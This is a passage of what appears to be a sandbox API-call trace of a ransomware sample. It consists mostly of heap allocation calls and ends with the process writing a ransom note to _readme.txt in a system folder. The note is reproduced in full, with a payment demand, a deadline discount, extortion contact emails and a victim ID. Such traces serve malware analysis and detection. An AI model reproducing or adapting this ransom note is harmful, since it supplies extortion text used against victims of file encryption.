Size=0x860) returned 0x3221ae8 [0142.669] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3221ae8 | out: hHeap=0x620000) returned 1 [0142.669] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1d20 | out: hHeap=0x620000) returned 1 [0142.669] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1d20 [0142.669] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3221ae8 [0142.669] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3221ae8 | out: hHeap=0x620000) returned 1 [0142.669] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1d20 | out: hHeap=0x620000) returned 1 [0142.669] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1d20 [0142.669] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aaf2b8 [0142.669] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.669] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1d20 | out: hHeap=0x620000) returned 1 [0142.669] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1f28 | out: hHeap=0x620000) returned 1 [0142.669] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3272388 | out: hHeap=0x620000) returned 1 [0142.669] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1988 | out: hHeap=0x620000) returned 1 [0142.669] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1f50 | out: hHeap=0x620000) returned 1 [0142.669] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3283f58 | out: hHeap=0x620000) returned 1 [0142.669] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac12d0 | out: hHeap=0x620000) returned 1 [0142.669] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1fa0 | out: hHeap=0x620000) returned 1 [0142.669] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3272350 | out: hHeap=0x620000) returned 1 [0142.670] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x32723f8 | out: hHeap=0x620000) returned 1 [0142.670] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1960 | out: hHeap=0x620000) returned 1 [0142.670] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.670] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3283fe8 | out: hHeap=0x620000) returned 1 [0142.670] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.670] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac21a8 | out: hHeap=0x620000) returned 1 [0142.670] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1730 | out: hHeap=0x620000) returned 1 [0142.670] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x321efd0 | out: hHeap=0x620000) returned 1 [0142.670] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1730 [0142.670] PeekMessageW (in: lpMsg=0x9dbfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9dbfb74) returned 0 [0142.670] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac21a8 [0142.670] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aaf2b8 [0142.670] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.670] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac21a8 | out: hHeap=0x620000) returned 1 [0142.670] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac21a8 [0142.670] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aaf2b8 [0142.670] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.670] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac21a8 | out: hHeap=0x620000) returned 1 [0142.670] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac21a8 [0142.670] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aaf2b8 [0142.670] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.670] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac21a8 | out: hHeap=0x620000) returned 1 [0142.670] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac21a8 [0142.670] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aaf2b8 [0142.670] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.670] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac21a8 | out: hHeap=0x620000) returned 1 [0142.670] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac21a8 [0142.670] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aaf2b8 [0142.670] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.670] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac21a8 | out: hHeap=0x620000) returned 1 [0142.670] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac21a8 [0142.670] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x9aaf2b8 [0142.670] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.670] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac21a8 | out: hHeap=0x620000) returned 1 [0142.671] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac21a8 [0142.671] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aaf2b8 [0142.671] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc2e) returned 0x325d510 [0142.671] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.671] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x325d510 | out: hHeap=0x620000) returned 1 [0142.671] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac21a8 | out: hHeap=0x620000) returned 1 [0142.671] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac21a8 [0142.671] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aaf2b8 [0142.671] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.671] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac21a8 | out: hHeap=0x620000) returned 1 [0142.671] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac21a8 [0142.671] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x9aaf2b8 [0142.671] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.671] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac21a8 | out: hHeap=0x620000) returned 1 [0142.671] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac21a8 [0142.671] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3221ae8 [0142.671] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3221ae8 | out: hHeap=0x620000) returned 1 [0142.671] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac21a8 | out: hHeap=0x620000) returned 1 [0142.671] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac21a8 [0142.671] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3221ae8 [0142.671] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3221ae8 | out: hHeap=0x620000) returned 1 [0142.671] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac21a8 | out: hHeap=0x620000) returned 1 [0142.671] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac21a8 [0142.671] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aaf2b8 [0142.671] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.671] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac21a8 | out: hHeap=0x620000) returned 1 [0142.671] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac21a8 [0142.671] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aaf2b8 [0142.671] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.671] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac21a8 | out: hHeap=0x620000) returned 1 [0142.671] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac21a8 [0142.671] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x9aaf2b8 [0142.671] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.672] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac21a8 | out: hHeap=0x620000) returned 1 [0142.672] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac21a8 [0142.672] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x9aaf2b8 [0142.672] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.672] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac21a8 | out: hHeap=0x620000) returned 1 [0142.672] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac21a8 [0142.672] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aaf2b8 [0142.672] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.672] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac21a8 | out: hHeap=0x620000) returned 1 [0142.672] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac21a8 [0142.672] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aaf2b8 [0142.672] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.672] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac21a8 | out: hHeap=0x620000) returned 1 [0142.672] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac21a8 [0142.672] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aaf2b8 [0142.672] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.672] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac21a8 | out: hHeap=0x620000) returned 1 [0142.672] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac21a8 [0142.672] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aaf2b8 [0142.672] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.672] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac21a8 | out: hHeap=0x620000) returned 1 [0142.672] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac21a8 [0142.672] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aaf2b8 [0142.672] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.672] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac21a8 | out: hHeap=0x620000) returned 1 [0142.672] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac21a8 [0142.672] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aaf2b8 [0142.672] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.672] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac21a8 | out: hHeap=0x620000) returned 1 [0142.672] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac21a8 [0142.672] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aaf2b8 [0142.672] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.672] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac21a8 | out: hHeap=0x620000) returned 1 [0142.673] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac21a8 [0142.673] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aaf2b8 [0142.673] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x325d510 [0142.673] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.673] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x325d510 | out: hHeap=0x620000) returned 1 [0142.673] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac21a8 | out: hHeap=0x620000) returned 1 [0142.673] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac21a8 [0142.673] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aaf2b8 [0142.673] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.673] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac21a8 | out: hHeap=0x620000) returned 1 [0142.673] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac21a8 [0142.673] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aaf2b8 [0142.673] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc2e) returned 0x325d510 [0142.673] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.673] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x325d510 | out: hHeap=0x620000) returned 1 [0142.673] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac21a8 | out: hHeap=0x620000) returned 1 [0142.673] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac21a8 [0142.673] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3221ae8 [0142.673] PathFindFileNameW (pszPath="C:\\Boot\\cs-CZ\\") returned="cs-CZ\\" [0142.673] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.673] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0142.673] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0142.673] PathFindFileNameW (pszPath="") returned="" [0142.673] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.673] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x759d0000 [0142.674] GetProcAddress (hModule=0x759d0000, lpProcName="SHGetFolderPathW") returned 0x75a55708 [0142.674] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x800) returned 0x3221ae8 [0142.674] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x3221ae8 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0142.674] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x810) returned 0x9aaf2b8 [0142.674] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac21a8 [0142.674] FreeLibrary (hLibModule=0x759d0000) returned 1 [0142.674] PathAppendW (in: pszPath="C:\\Boot\\cs-CZ\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\cs-CZ\\_readme.txt") returned 1 [0142.674] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aafb40 [0142.674] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.674] PathFileExistsW (pszPath="C:\\Boot\\cs-CZ\\_readme.txt") returned 0 [0142.676] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x7d00) returned 0x9ad6f98 [0142.676] lstrcpyW (in: lpString1=0x9ad6f98, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-xcn1Dtzak4\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@firemail.cc\r\n\r\nYour personal ID:\r\n0224yiuduy6S5d" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-xcn1Dtzak4\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@firemail.cc\r\n\r\nYour personal ID:\r\n0224yiuduy6S5d") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-xcn1Dtzak4\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@firemail.cc\r\n\r\nYour personal ID:\r\n0224yiuduy6S5d" [0142.676] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-xcn1Dtzak4\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@firemail.cc\r\n\r\nYour personal ID:\r\n0224yiuduy6S5d", lpString2="9UR8CEfVlhGJx3jwwXdVqZ3owpwVZwN7BjVbRUSR" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-xcn1Dtzak4\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@firemail.cc\r\n\r\nYour personal ID:\r\n0224yiuduy6S5d9UR8CEfVlhGJx3jwwXdVqZ3owpwVZwN7BjVbRUSR") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-xcn1Dtzak4\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@firemail.cc\r\n\r\nYour personal ID:\r\n0224yiuduy6S5d9UR8CEfVlhGJx3jwwXdVqZ3owpwVZwN7BjVbRUSR" [0142.676] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9ab03c8 [0142.676] CreateFileW (lpFileName="C:\\Boot\\cs-CZ\\_readme.txt" (normalized: "c:\\boot\\cs-cz\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x6f0 [0142.677] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8c0) returned 0x3221ae8 [0142.677] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x85b) returned 0x325d510 [0142.677] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-xcn1Dtzak4\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@firemail.cc\r\n\r\nYour personal ID:\r\n0224yiuduy6S5d9UR8CEfVlhGJx3jwwXdVqZ3owpwVZwN7BjVbRUSR", cchWideChar=-1, lpMultiByteStr=0x325d510, cbMultiByte=2139, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-xcn1Dtzak4\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@firemail.cc\r\n\r\nYour personal ID:\r\n0224yiuduy6S5d9UR8CEfVlhGJx3jwwXdVqZ3owpwVZwN7BjVbRUSR", lpUsedDefaultChar=0x0) returned 1116 [0142.677] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x321dfc8 [0142.677] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x325d510 | out: hHeap=0x620000) returned 1 [0142.677] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3221ae8 | out: hHeap=0x620000) returned 1 [0142.677] lstrlenA (lpString="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-xcn1Dtzak4\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@firemail.cc\r\n\r\nYour personal ID:\r\n0224yiuduy6S5d9UR8CEfVlhGJx3jwwXdVqZ3owpwVZwN7BjVbRUSR") returned 1115 [0142.677] WriteFile (in: hFile=0x6f0, lpBuffer=0x321dfc8*, nNumberOfBytesToWrite=0x45b, lpNumberOfBytesWritten=0x9dbfb64, lpOverlapped=0x0 | out: lpBuffer=0x321dfc8*, lpNumberOfBytesWritten=0x9dbfb64*=0x45b, lpOverlapped=0x0) returned 1 [0142.678] CloseHandle (hObject=0x6f0) returned 1 [0142.678] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x321dfc8 | out: hHeap=0x620000) returned 1 [0142.678] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ab03c8 | out: hHeap=0x620000) returned 1 [0142.678] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ad6f98 | out: hHeap=0x620000) returned 1 